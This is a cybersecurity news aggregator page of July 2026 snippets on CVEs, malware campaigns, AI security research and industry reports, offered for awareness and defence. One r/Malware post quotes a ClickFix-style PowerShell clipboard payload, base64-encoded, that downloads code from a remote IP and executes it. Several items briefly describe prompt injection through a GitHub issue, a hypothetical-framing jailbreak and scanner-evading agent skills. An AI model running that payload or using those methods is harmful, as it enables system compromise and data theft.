Cybersecurity News and Vulnerability Aggregator

Cybersecurity news aggregator

Top Cybersecurity Stories Today

The Hacker News 8h ago

U.S. prosecutors linked an alleged Scattered Spider hacker to a break-in at a luxury jewelry retailer using a persistent Windows device ID, according to a newly unsealed federal complaint. Microsoft records tied that ID first to the account the attackers used to keep access during the May 2025 intrusion, then to online accounts prosecutors say belong to 19-year-old Peter Stokes. Stokes is

The Hacker News 5h ago

A critical flaw in Google's Dialogflow CX could have let an attacker with edit rights on one Code Block-enabled agent compromise other Code Block-enabled agents in the same Google Cloud project. From there, they could read live conversations, steal the data users shared, and make the bots send attacker-written messages, including requests to re-enter a password. Security firm Varonis found it

The Hacker News 15h ago

Several versions of firmware released by Chinese network device manufacturer Tenda have been found to embed an undocumented authentication backdoor that enables administrative access to the devices' web management interfaces, the CERT Coordination Center (CERT/CC) warned Monday. "An attacker can exploit this vulnerability, tracked as CVE-2026-11405, to bypass the password verification process

Latest

Tuesday, July 7
r/cybersecurity 1h ago

I’ve been working on an open-source AI risk register for organizations deploying AI systems, and I thought the security layer may be useful to people here. The project is called DARR, the Deployer AI Risk Register. It is an open reference register/data set intended to make AI deployment risks easier to map into security, risk, governance, audit, and assurance workflows. The security tier currently includes 61 MITRE ATLAS-anchored sub-risks and crosswalks to: * MITRE ATLAS * OWASP Top 10 for LLM Applications * OWASP Top 10 for Agentic Applications * NIST AI 100-2 on adversarial machine learning * NIST AI 600-1 on the GenAI profile * Cisco AI Security Framework * IBM AI Risk Atlas * ISO/IEC 42001 and 23894 * EU AI Act The broader register has 82 canonical AI deployment risks across 7 families, but for this subreddit the most relevant path is the Security & Adversarial family: prompt injection, agent/tool misuse, data exposure, model abuse, insecure deployment patterns, adversarial ML, and supply-chain issues. The data is on GitHub, and the register is licensed under CC BY 4.0. Live register: [https://www.airiskdeployer.org](https://www.airiskdeployer.org/)

r/cybersecurity 2h ago

Um teste pós-restauração de um pesquisador independente afirma que o Fable 5 da Anthropic ajudou a planejar um ataque de botnet IoT usando um enquadramento hipotético, enquanto modelos rivais de IA supostamente se recusaram a fazê-lo.  [Fable 5 ajuda a planejar ataques cibernéticos após o seu retorno, segundo pesquisadores | Setup Raiz](https://setupraiz.com.br/fable-5-ajuda-a-planejar-ataques-ciberneticos-apos-o-seu-retorno-segundo-pesquisadores)

r/cybersecurity 3h ago

Hi guys, I send out a weekly newsletter with the latest cybersecurity vendor reports and research, and thought you might find it useful, so sharing it here. All the reports and research below were published between June 29th - July 5th. You can get the below into your inbox every week if you want: [https://www.cybersecstats.com/cybersecstatsnewsletter/](https://www.cybersecstats.com/cybersecstatsnewsletter/)  # Big Picture Reports  **Bitdefender Cybersecurity Assessment 2026** 1,000+ IT and security professionals tell Bitdefender what's really happening inside their organizations.  **Key stats:** * 55.2% of IT and security professionals who experienced a security incident in the past 12 months were told to keep it confidential despite believing it should have been reported. * 47.4% of IT and security professionals acknowledge only partial or no visibility into individual shadow AI tools or personal accounts used for work. * The top barriers to reducing the attack surface: high overhead in maintaining hardening rules and exceptions (38%), fear of operational disruption (35.4%), and resource constraints (34.6%). *Read the full report* [*here*](https://www.cybersecstats.com/r/b2eb6171?m=50f43416-1146-4a3d-a1e1-5afc95e09a39)*.* **State of Threat Management 2026 (Filigran)** Security teams have more visibility and tooling than ever, but still can't work out which exposures are actually exploitable. **Key stats:** * 42% of security team time goes to investigating risks that later prove low priority or non-exploitable. * Organizations deploy an average of 14 different threat intelligence feeds. * 61% of organizations say they cannot determine which vulnerabilities are most likely to be exploited in real-world attacks. *Read the full report* [*here*](https://www.cybersecstats.com/r/39729c14?m=50f43416-1146-4a3d-a1e1-5afc95e09a39)*.* # Vulnerability and Exposure Management **Under Pressure: The 2026 Exposure Gap Report (Check Point)** Vulnerabilities increased, but most of them don't actually matter.  **Key stats:** * 42.6% of all critical exposures are vulnerabilities, more than double the 18.7% recorded the year before. * Only 7.8% of vulnerability alerts warrant Critical or High attention after exploitability validation. * Phishing websites account for 10.5% of critical exposures, up from 1.0% the year before. *Read the full report* [*here*](https://www.cybersecstats.com/r/e550b96c?m=50f43416-1146-4a3d-a1e1-5afc95e09a39)*.* # AI Coding **AI Code Generation Reality Check (Flux)** A timely follow-up to last week's batch of AI coding reports.  **Key stats:** * 44.7% of organizations already run AI-generated code in production. * 35% use AI to write code, but do not ship that AI-generated code to production. * 49.2% report security issues related to AI-generated code are hard to catch week-to-week. *Read the full report* [*here*](https://www.cybersecstats.com/r/11700d7c?m=50f43416-1146-4a3d-a1e1-5afc95e09a39)*.* # Regional Spotlight  **From Agentic Risk to Human Wins Report (UK) (KnowBe4)** A month or so ago, KnowBe4 published a report on how organisations are adapting their security cultures for a workforce that now includes AI agents. This is the UK version.  **Key stats:** * 51% of leaders at UK organisations admit that AI usage within their perimeter is entirely unapproved or lacks formal corporate governance. * 58% of cybersecurity decision-makers report that the unsanctioned use of external software and rogue AI applications has directly degraded or actively compromised their security posture over the past 12 months. * 21% of UK employees say they don't always use official corporate AI tools provided by their organisation. *Read the full report* [*here*](https://www.cybersecstats.com/r/8f43dbbd?m=50f43416-1146-4a3d-a1e1-5afc95e09a39)*.* **From Agentic Risk to Human Wins Report (UAE & Saudi Arabia) (KnowBe4)** And the UAE and Saudi Arabia edition, where shadow AI looks like an even bigger headache. **Key stats:** * 52% of cybersecurity decision-makers report that the unsanctioned use of external software and rogue AI has directly degraded or actively compromised their security posture. * 41% of local workers will actively source their own unapproved agentic AI tools to bypass administrative blocks if official tools are restricted or too slow. * 44% confess that time constraints, cognitive overload, and workplace distractions drive them to cut corners and make critical security errors. *Read the full report* [*here*](https://www.cybersecstats.com/r/0eec937d?m=50f43416-1146-4a3d-a1e1-5afc95e09a39)*.* **Don't pay the ransom: Warning to organisations to protect themselves (City of London Police)** UK ransomware numbers.  **Key stats:** * 323 UK organisations reported a ransomware attack between April 2025 and March 2026. * More than 50% were from small and medium enterprises, meaning 175 SME reports. * Financial losses totalling around £270,000 were reported by UK organisations that experienced ransomware, a 50% increase compared to the previous year. *Read the full report* [*here*](https://www.cybersecstats.com/r/9f2f1cba?m=50f43416-1146-4a3d-a1e1-5afc95e09a39)*.* **Cybercrime in Australia 2025 (Australian Institute of Criminology)** In Australia's big annual cybercrime survey, the small and medium enterprise numbers caught our eye. **Key stats:** * 25% of small to medium enterprise owners said their business was negatively impacted by cybercrime in the last 12 months. * 33.9% of SME owners or managers reported experiencing malware. * 28.7% of cybercrime victims said cybercrime impacted the everyday function of their business. *Read the full report* [*here*](https://www.cybersecstats.com/r/97bc9027?m=50f43416-1146-4a3d-a1e1-5afc95e09a39)*.* # Industry-Specific  **2026 Higher Education Third-Party Cyber Risk Report (UpGuard)** US universities rely on a lot of vendors. Maybe too many?  **Key stats:** * 28% of the top 100 vendors most commonly used by universities have experienced a data breach since 2024. * 11% of the top 100 vendors most commonly used by universities currently show evidence of active infostealer malware infections. * 95% of universities have at least one vendor with embedded AI exposure. *Read the full report* [*here*](https://www.cybersecstats.com/r/b00a1c45?m=50f43416-1146-4a3d-a1e1-5afc95e09a39)*.*

The Hacker News 4h ago

A new Android malware operation called RedWing is being rented out on Telegram as a ready-made bank-fraud service. It lets even low-skill criminals take over a victim's phone, steal their banking logins, and capture the one-time codes that protect their accounts. Zimperium's zLabs, which found the operation, says it looks like a new variant of Oblivion, a $300-a-month rent-a-malware tool

The Hacker News 5h ago

A critical flaw in Google's Dialogflow CX could have let an attacker with edit rights on one Code Block-enabled agent compromise other Code Block-enabled agents in the same Google Cloud project. From there, they could read live conversations, steal the data users shared, and make the bots send attacker-written messages, including requests to re-enter a password. Security firm Varonis found it

r/blueteamsec 6h ago

Quick disclosure before anything else: I work at DeepTempo, and one of the models in this benchmark (LogLM) is ours. So yeah, factor that in as you read. The upside is that all of it is open source and reproducible, which means you don't have to trust me on a single number here. Clone it, run it, tell me where I'm wrong. That's the whole reason it's public. I've been quietly annoyed for a while now. Every "AI in the SOC" pitch I see opens with a gorgeous demo and somehow never gets around to showing how the thing holds up on the boring, noisy telemetry a defender stares at all day. So I finally built a benchmark for exactly that (SOCBench), and I started with the least glamorous but most challenging SOC task there is: detection on raw NetFlow. Here's the part I want to be upfront about: I rigged the setup in the LLMs' favor, on purpose. \* The three frontier models got to run as full multi-turn agents. Bounded ReAct loop, read-only investigative tools, four expert personas, big context budgets, and a cost cap so they couldn't run forever. \* LogLM got none of that. It's a small encoder-only model, and all it ever saw was the raw flows. One shot, no tools, no personas. Here's the traffic, what's malicious? \* Everyone got the same 1,205 eval units (Stratosphere Labs captures), the same hidden ground truth, and it was all zero-shot. The logic was simple. If the LLMs were going to fall over, I wanted them to do so under the most flattering conditions I could create — every advantage stacked on their side, and our little encoder walking in with nothing but the flows. So what happened? \* They can tell when something's off. Verdict F1 (just "is this unit malicious or not") came in between 0.86 and 0.93 for each model's best persona. Respectable, no complaints. \* But they cannot keep their mouth shut on clean traffic. This is the one that matters, as in the real world, almost everything on the wire is benign. ​ | Model | FP on benign inside malware | FP on fully benign | |---|---|---| | Claude Opus 4.7 | 36% | 39% | | GPT-5.4 | 53% | 43% | | Gemini 2.5 Pro | 41% | 86% | | LogLM | <1% | <2% | \* They can detect, but they can't point. Fine, it flagged a unit. Can it tell you which flows drove the call? Per-flow F1: Claude 65%, Gemini 52%, GPT 44%. LogLM sits at 99%. An alert that basically says "something in these 1,000 flows is bad, have fun" doesn't save your analyst a single minute. \* And it's not cheap. Per single-persona alert: Claude $0.150, Gemini $0.062, GPT $0.057. LogLM is under $0.0001. Feels trivial until you do the multiplication: at a million alerts a day, even the cheapest LLM is burning \\\~$57k/day before a human looks at anything. At telco scale, you're into hundreds of millions a day, on inference alone. Why this happens: these models have read basically everything ever written about how network traffic can be malicious, so their internal "is this flow suspicious?" prior sits way, way above the real base rate out in the wild. It stays hidden on a benchmark that's mostly malicious. The second you ask the model to sit quietly on clean traffic, it comes roaring out. LLMs are excellent at the stuff that reads like a story with steps: triage, enumeration, chaining an exploit, turning a paragraph into a detection rule, and writing up an incident. Flow-level detection just isn't that kind of problem. There's no narrative thread to follow; the signal is buried in the distribution across thousands of connections. That's a job for an encoder, not an agent. SOCBench is open, and I want people to poke holes in it and push it further. A benchmark for AI in security really shouldn't be one vendor's homework assignment, mine included. If you work in detection, DFIR, or hunting, I'd love a few things: datasets that look like your environment, thoughts on the scoring (especially the explainability lenses), ideas for tasks beyond detection (triage, IR, hunting, detection engineering are all next), or just someone running it and telling me where it breaks. Repo: \[github.com/DeepTempo/socbench\](http://github.com/DeepTempo/socbench) Full writeup with all the tables: \[deeptempo.ai/blogs/the-36-percent-false-positive-problem-with-llm-in-the-soc\](http://deeptempo.ai/blogs/the-36-percent-false-positive-problem-with-llm-in-the-soc) Have at it in the comments.

The Hacker News 6h ago

A Microsoft 365 device code phishing campaign has been observed leveraging collaboration-themed lures to take control of victim accounts between the last week of June 2026 and into early July, per findings from ZeroBEC. "The campaign did not depend on a fake Microsoft password page. It used a malicious collaboration-style lure to push users into the legitimate Microsoft device login experience,

The Hacker News 8h ago

A public issue can trick GitHub Agentic Workflows into leaking the contents of an organization's private repositories, researchers at Noma Security have shown. The attacker needs only to open a normal-looking issue on a public repository, with no stolen credentials and no access to the organization. If that organization has given the agent read access across its repositories, private ones

The Hacker News 8h ago

U.S. prosecutors linked an alleged Scattered Spider hacker to a break-in at a luxury jewelry retailer using a persistent Windows device ID, according to a newly unsealed federal complaint. Microsoft records tied that ID first to the account the attackers used to keep access during the May 2025 intrusion, then to online accounts prosecutors say belong to 19-year-old Peter Stokes. Stokes is

The Hacker News 10h ago

Software supply chain security was hard enough. Then AI joined the build pipeline. For five years, "software supply chain security" meant one question: what's in your code? Which open-source packages, which versions, which transitive dependencies three layers deep that nobody chose on purpose? SolarWinds, Log4Shell, and XZ Utils all taught the same lesson: the risk lives less in the code a

The Hacker News 12h ago

A suspected China-aligned threat activity cluster has been observed exploiting Roundcube webmail software belonging to physics and engineering departments of U.S. and Canadian universities as part of a new campaign. The activity involves the exploitation of now-patched, critical security flaws in the open-source email solution, such as CVE-2024-42009 (CVSS score: 9.3), to siphon credentials,

NVISO Labs 13h ago

Continuing our journey through Sentinel ingestion cost reduction, this part focuses on one of the most expensive log sources: firewalls, and more specifically, network traffic events. Network traffic logs from firewalls are highly voluminous and often become the largest contributor to data ingestion costs. At the same time, they remain a valuable source of information during Incident Response or while developing Threat Detection use cases, as they provide a centralized view of network activity across the environment. T

Compass Security 15h ago

In this second part, we demonstrate how a Cyber Resilience Act (CRA) assessment is performed in practice. Using a low-cost IP camera as an example, we show how a product is classified, how threats are modelled, how hardware and firmware are analysed, and how compliance gaps against IEC 62443-4-2 can be identified. You may want visit the Cyber Resilience Act – Part I , where we also explored the legal landscape of CRA and discuss the shifting responsibilities for digital product manufacturers, establishing that CRA compliance is a fundamental requirement for market access in the EU. From Threats to Requirements Consider a common consumer product: a budget IP camera sourced via marketplaces such as Wish or Temu. The journey toward CRA readiness begins with defining the device’s attack surface through threat modelling for example using the STRIDE methodology, which categorizes threats into Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege. Threat modelling ensures that subsequent testing focuses on realistic attack scenarios and the security controls that matter most for the product, rather than relying on a generic checklist.

The Hacker News 15h ago

Several versions of firmware released by Chinese network device manufacturer Tenda have been found to embed an undocumented authentication backdoor that enables administrative access to the devices' web management interfaces, the CERT Coordination Center (CERT/CC) warned Monday. "An attacker can exploit this vulnerability, tracked as CVE-2026-11405, to bypass the password verification process

The Hacker News 16h ago

BeyondTrust has released updates to address two critical security flaws affecting Remote Support (RS) and Privileged Remote Access (PRA) products that, if successfully exploited, could allow unauthenticated attackers to take control of susceptible devices. The vulnerabilities are listed below - CVE-2026-40138 (CVSS score: 9.2) - A pre-authentication vulnerability exists in the

Monday, July 6
Praetorian Jul 6

Overview In the first installment of this series , I walked through how I leveraged large language models to assist in identifying several vulnerabilities in the FreeBSD kernel, including a stack-based buffer overflow assigned CVE-2026-3038 . This raised a natural follow-up question. Can language models effectively write exploits for memory corruption vulnerabilities? This article explores that question. I’ll detail two exploit chains I developed that achieve a full escape from a FreeBSD jail environment. The first chain pairs a stack-based buffer overflow with a stack-based information leak to defeat both stack canaries and KASLR. The second takes a different path, combining a heap-based buf

The Hacker News Jul 6

An Iranian hacking group affiliated with Iran's Ministry of Intelligence and Security (MOIS) has been wielding a previously undocumented modular command-and-control (C2) framework dubbed Cavern (aka Cav3rn) targeting Israeli organizations. The activity, which has primarily singled out IT providers and government sectors, has been attributed to a threat cluster tracked by Check Point Research

CERT/CC Jul 6

Overview HP Printers in the Deskjet 2800 Series running firmware version &lt;=TBP1CN2612AR contain a missing authorization vulnerability tracked as CVE-2026-13753 . This vulnerability allows unauthenticated access to the printer's webserver API endpoints, exposing Wi-Fi credentials, management configuration details, and sensitive security data normally restricted to administrative users. Description Modern HP printers provide a web-based management interface for configuring content such as Wi-Fi Direct settings, SNMP management access, and device security options. When accessed normally through the browser interface, these pages explicitly require administrator credentials before sensitive information is displayed. This information is protected because, for example, Wi-Fi Direct controls the printer's direct wireless connectivity, and SNMP configuration settings can reveal detailed information about the device's monitoring and management controls. In affected firmware versions, the authorization requirement can be bypassed by sending direct, unauthenticated GET requests to multiple backend API endpoints. The affected endpoints return administrative configuration data without validating session state or authentication, including the Wi-Fi Direct SSID and plaintext passphrase, unique printer serial numbers and service IDs, and details about the device's administrative password state. This information is freely disclosed even though the corresponding web interface pages correctly enforce authentication, indicating an authorization flaw in the API layer. Impact A remote attacker with network access to the printer can bypass the web interface's authentication requirements and retrieve sensitive configuration data directly fr

The Hacker News Jul 6
CVE

A use-after-free bug in Linux's KVM hypervisor can be triggered from a guest virtual machine to corrupt the shadow-page state of the host kernel that runs it. Dubbed 'Januscape' and tracked as CVE-2026-53359, the flaw sits in the shadow MMU code that KVM shares across both Intel and AMD. The public proof-of-concept panics the host; the researcher claims that a separate, unreleased exploit

The Hacker News Jul 6

Threat actors have been observed attempting to exploit a recently patched critical security flaw in Gitea Docker images, according to Sysdig. The vulnerability in question is CVE-2026-20896 (CVSS score: 9.8), a vulnerability that stems from the DevOps platform trusting the "X-WEBAUTH-USER" header from any source IP address, effectively allowing an unauthenticated internet client to get elevated

The Hacker News Jul 6

A streaming box should not need a threat model. Neither should a username field, a demo repo, a reset flow, or a browser permission prompt. That is the irritating part this week: the risky pieces were ordinary. Home devices became a routing cover. Clean code pulled dirt from a dependency. Identity shortcuts aged badly. AI systems trusted the wrong instructions. Same soft spot throughout: trust

The Hacker News Jul 6

Building a shortlist for an AI SOC evaluation can be tough. SIEM, SOAR, and pureplay AI SOC vendors are all saying the same thing. But behind the identical label sit very different products, from chat assistants bolted onto a legacy SIEM to agent platforms that run detection, triage, investigation, and response on their own data foundation. Whether a platform will materially change outcomes for

r/netsec Jul 6

Porting the functionality of dnscmd.exe into (slightly) more OPSEC safe Beacon Object Files (BOFs) so you can get domain admin rights when you manage to impersonate a user that is a member of the DnsAdmins group, or if using dnscmd.exe simply isn’t an option.

The Hacker News Jul 6

Researchers at Shandong University have shown a fast new way to pull data off computers that are cut off from every network. The technique, called TrojPix, tweaks on-screen pixels in ways the eye cannot see, so that the video cable carrying them radiates a faint radio signal a nearby receiver can decode. But TrojPix works only once malware is already on the target machine, so it

The Hacker News Jul 6

Cybersecurity researchers have flagged a novel Java-based remote access trojan (RAT) called QuimaRAT that's capable of targeting Windows, Linux, and macOS environments. According to LevelBlue, the cross-platform malware is advertised under a malware-as-a-service (MaaS) model, costing anywhere between $150 for one month to $1,200 for lifetime access. Other subscription tiers include $300 for

The Hacker News Jul 6

Researchers found a flaw in Opera GX, the gaming-focused version of the Opera browser, that let a malicious website silently install a browser add-on and use it to lift specific data from the pages a victim visits. In a proof of concept, they reconstructed a signed-in user's full Gmail address from a single visit, with no click. Opera has patched the flaw and says it found no evidence that

r/ReverseEngineering Jul 6

To reduce the amount of noise from questions, we have disabled self-posts in favor of a unified questions thread every week. Feel free to ask any question about reverse engineering here. If your question is about how to use a specific tool, or is specific to some particular target, you will have better luck on the [Reverse Engineering StackExchange](http://reverseengineering.stackexchange.com/). See also /r/AskReverseEngineering.

The Hacker News Jul 6

Scanners meant to catch malicious add-on "skills" for AI coding agents can be fooled by a few simple changes that leave the malware working, according to a new study from researchers at the Hong Kong University of Science and Technology. Their strongest trick slipped past every scanner tested more than 90% of the time, and the same team built a runtime checker that catches most of the

r/computerforensics Jul 6

https://preview.redd.it/xfm8scpfyjbh1.png?width=1240&format=png&auto=webp&s=cc1fc0bbeaca4dfd7aee75951f8ec61070e262bf Sharing some lessons from a challenging forensic PCAP analysis: 1. Map the C2 protocol first. Understanding how the attacker communicates tells you what to expect in every packet. 2. Encryption keys aren't always what they look like. A hex string can be interpreted multiple ways — raw bytes, UTF‑8 encoding, even UTF‑16. If your decrypted output is garbage, ask yourself whether you're using the right form of the key. 3. Responses matter as much as requests. In encrypted C2 channels, the server sends back just as much intel as the attacker sends up. 4. Gzip inside base64 inside C# inside AES. It sounds absurd, but nesting is a real obfuscation pattern. 5. Check file‑creation side effects. Sometimes the payload writes a file you can use as a decryption key elsewhere. If you're getting into forensics CTFs, grab a PCAP with at least 4k packets and try to reconstruct the full timeline — it's a different beast from Jeopardy‑style challenges.

Datadog Security Labs Jul 6

This post continues and concludes our series on Agent ID, by outlining steps that an administrator or security team can take to secure blueprints and agent identities created in their local Entra ID tenant.

Sunday, July 5
Saturday, July 4
r/Malware Jul 4

Our latest McAfee Labs research exposes a browser extension campaign that poses as a harmless note-taking tool while silently hijacking crypto transactions. The malware tampers with Chrome/Edge/Brave’s trust mechanisms to install without consent, resolves its command-and-control server via a blockchain smart contract (EtherHiding) to evade takedown, and swaps copied wallet addresses with attacker-controlled ones across BTC, ETH, XRP, BCH, and DASH — turning a routine copy-paste into an irreversible loss. Full technical breakdown and IOCs inside

Friday, July 3
r/Malware Jul 3

[they are getting smarter](https://preview.redd.it/d40lwwsmv1bh1.png?width=1407&format=png&auto=webp&s=deb513ded2423277ed3a8437e1d3763dc138d62c) this is what the script copied to my clipboard. funny that this website was opened for the first time, yet chrome gave it clipboard permission. lol iex(\[Text.Encoding\]::ASCII.GetString(\[Convert\]::FromBase64String('SW52b2tlLVdlYlJlcXVlc3QgJ2h0dHA6Ly8xNjYuMS44OS45MS9fLycgLVVzZUJhc2ljUGFyc2luZyB8IEludm9rZS1FeHByZXNzaW9u')))

Heimdal Security Jul 3

Most breaches don’t start with a vulnerability nobody knew about. They start with one nobody patched in time. Vulnerability exploitation is now the single biggest way attackers get into a network. It has overtaken stolen credentials for the first time in the 19-year history of Verizon’s Data Breach Investigations Report, with 31% of breaches now […] The post How to scale your patches without scaling your team (the patch wave) appeared first on Heimdal Security Blog .

Heimdal Security Jul 3

Claude Mythos, an AI model from Anthropic, has found 23,019 software vulnerabilities in the past month. Fewer than 1% of them have been patched. That gap is the story. Finding a vulnerability used to be the hard part, the thing that limited how fast software got fixed. AI just closed that gap to almost nothing. […] The post AI didn’t break patching. It showed us patching was already broken. appeared first on Heimdal Security Blog .

r/Malware Jul 3

I have turned on my mac in the morning and got this message? Facts or Cap? https://preview.redd.it/kb4sv0aewyah1.png?width=1156&format=png&auto=webp&s=c1db885a6f856d112f9bb3918583af5c51a4a64a

Troy Hunt Jul 3

Presently sponsored by: Report URI: Guarding you from rogue JavaScript! Don’t get pwned; get real-time alerts & prevent breaches #SecureYourSite I can't recall if someone else originally came up with this saying or if I said it in some off-the-cuff comment and it just propagated, but since it's often attributed back to me , I'll relay it here regardless: Trying to delete yourself from the internet is like trying to take piss out of a swimming pool Depending on the publication, I'll tailor the saying to be either more broadly palatable or more, uh, "Australian", but the sentiment doesn't change: once data spreads on the internet, you can never put a lid on it. This is important in the context of data breaches because it speaks to the immutability of our exposed personal information. It also speaks to the limited practicality of services that promise to erase your data from the internet, and it's the constant outreach from these organisations looking for marketing opportunities on Have I Been Pwned (HIBP) that's prompted me to write this. Let's begin with those services, and because there are so many and I don't want to throw any of them under the bus, I won't name names. I also won't name them because whilst they're rather assertive in their marketing outreach, I do believe they're well-intentioned and I don't want to imply otherwise. And they have a role to play; it's ju

Thursday, July 2
Krebs on Security Jul 2

The Federal Bureau of Investigation (FBI) said today it worked with industry partners to seize hundreds of domains associated with NetNut , a sprawling residential proxy service operated by the publicly-traded Israeli company Alarum Technologies [NASDAQ: ALAR]. The action comes roughly two weeks after KrebsOnSecurity published findings from multiple security firms connecting NetNut to the Popa botnet, a collection of at least two million devices that have been compromised by malicious software with little or no consent from victims. The NetNut homepage today was replaced by this seizure banner from the FBI. On June 19, three different security firms issued similar findings : That NetNut is a residential proxy network which populates a botnet called Popa, and distributes software for devices commonly found in homes, such as smart TVs and streaming boxes. NetNut’s software turns those systems into always-on residential proxy nodes that are rented to others, who predominantly use them to relay abusive and intrusive Internet traffic, such as mass content scraping, advertising fraud, and account takeover activity.

Praetorian Jul 2

How we built a procedural engine that learns your real cloud environment, generates decoy environments indistinguishable from production, and converts every attacker interaction into signal. In the myth, Daedalus built the Labyrinth of Knossos so well that he nearly couldn’t escape it himself. The corridors looked real. The paths felt purposeful. And the deeper you went, the harder it became to tell which direction led out. That’s the design constraint we gave ourselves when building Knossos for Praetorian Guard: generate cloud infrastructure so realistic that an attacker who lands inside it doesn’t realize they’ve already lost. Every API call they make, every role they assume, every secret they pull from Parameter Store, all of it is being recorded, scored, and fed back into the system that built the trap. The idea isn’t new. Honeypots have existed for decades. But the gap between a traditional honeypot and what a competent attacker expects to find in a real AWS account is enormous. Drop a single canary token in an otherwise empty VPC and you’ve told the attacker two things: you’re running deception, and there’s nothing interesting here. They pivot, and you’ve burned your one shot. Knossos takes a fundamentally different approach. Rather than scattering individual lures and hoping someone trips

watchTowr Jul 2

We’re back, melting - we’ve tried shouting, screaming, and throwing things at the Sun, and it is just not working. Before we begin our analysis, we want to be clear - given the number of vulnerabilities fixed (and some not mentioned..), we’ve struggled to have confidence in our attribution of “vulnerability specific CVE ID”. We’ve performed some informed, uninformed, random guesses - but as usual, please resist the urge to send us emails explaining how awful/wrong we are. We know some of you can’t resist, so please rest assured that we do read them, print them, and frame our favorites each month. Like the individual who emailed us 5 times to tell us that they were older than Telnet. Given that Telnet is newer than SSH (which we replied to tell you (your follow-up emails were caught by our spam filter, sorry)), we knew you were lying to us. As always, watchTowr clients gain industry-first access to our research days before publication to validate their exposure, accompanied by Active Defense capabilities to autonomously mitigate exposure. This research is a glimpse into the capabilities that power our Preemptive Exposure Management solution and get organizations ahead of inevitable in-the-wild exploitation: the

CERT/CC Jul 2

Overview The GamersFirst Anti-Cheat (GFAC) driver GFAC.sys contains multiple local privilege escalations and denial-of-service vulnerabilities stemming from insecure handling of user-controlled input through a minifilter communication port. A local attacker can abuse these flaws to perform arbitrary kernel memory writes, obtain privilege escalation to SYSTEM, or trigger a system crash. Description GFAC is a proprietary anti-cheat software developed by video game publisher Little Orbit. GFAC includes a kernel-mode driver, GFAC_Sys_x64.sys , that exposes privileged functionality to user-mode applications through a minifilter communication port. Although these low-level interfaces are necessary for the software's operation, vulnerabilities can arise if user-mode access is not properly restricted and validated. CVE-2026-12166 GFAC_Sys_x64.sys contains a NULL pointer dereference condition in its initialization and request handling logic. A local attacker can trigger the vulnerable code path, causing the driver to read or write to a memory address assigned as NULL. Successful exploitation results in a system crash (“blue screen of death”). CVE-2026-12167 The minifilter communication port that GFAC_Sys_x64.sys exposes does not enforce sufficiently restrictive security descriptors. As a result, low-privileged users can establish connections to the driver and access functions intended only for trusted processes. [RM1.1][MB1.2][RM1.3]User access to privileged functions could help an attacker take advantage of other weaknesses in the driver. CVE-2026-12168 GFAC_Sys_x64.sys processes messages received through a minifilter communication

Trail of Bits Jul 2
CVE

We’re running Patch the Planet , an ongoing collaboration with OpenAI that pairs Trail of Bits engineers directly with more than 30 open-source projects. Its goal is to front-run a serious problem facing open-source maintainers: highly capable models like GPT-5.5-Cyber will soon create a firehose of bug reports, and OSS maintainers are already spread thin. Our plan is to point OpenAI’s latest models at real codebases, find the security bugs first, work with maintainers to patch them, and find ways to decrease the burden on maintainers in the long run. We’ll publish field reports like this one as the initiative progresses; follow along via the Patch the Planet tag. The expertise barrier that kept bespoke fuzzing campaigns out of reach for most attackers is gone. We watched GPT-5.5-Cyber build in a single day what would have taken weeks for a skilled security researcher : harnesses across a dozen entrypoints, sanitizer and variant builds, seeds, and multiple findings currently undergoing coordinated disclosure. This particular instance focused on zlib , a widely used data format and lossless data compression software library. We pointed GPT-5.5-Cyber at the library and drove it through Codex with the /goal command, asking it to find a specific class of bugs that are critically dangerous in compression libraries. We’ll publish the full harness and findings for inspection once the vulnerabilities are patched and a new release is cut. The lab GPT-5.5-Cyber built in a day We didn’t tell the model how to find these bugs. The obvious first move is to read the source code, but zlib

Wednesday, July 1
NVISO Labs Jul 1

Introduction This blog post addresses the practical implications of Post-Quantum Cryptography (PQC). It examines why waiting for vendors is a high-risk strategy and why organizations must assume ownership of their own quantum-readiness efforts . It also introduces a more effective quantum-readiness playbook : a practical, risk-driven approach aimed at reducing exposure early, rather than relying on the commonly adopted inventory-first model. This is Part 2 of a two-part series and focuses on the practical implications of Post-Quantum Cryptography, including why organizations must take ownership of their own quantum-readiness journey and how a risk-driven approach can support

Heimdal Security Jul 1

COPENHAGEN, Denmark, 1 July 2026 – Heimdal today announced the launch of MSP Onboarding Wizard, a new capability that helps managed service providers onboard Microsoft Cloud Solution Provider (CSP) customers inside the Heimdal platform faster and with less manual work. Built for MSPs managing multiple Microsoft tenants, MSP Onboarding Wizard reduces customer onboarding from around […] The post Heimdal Launches MSP Onboarding Wizard to Help Partners Onboard Microsoft CSP Customers in 2 Minutes appeared first on Heimdal Security Blog .

Story Overview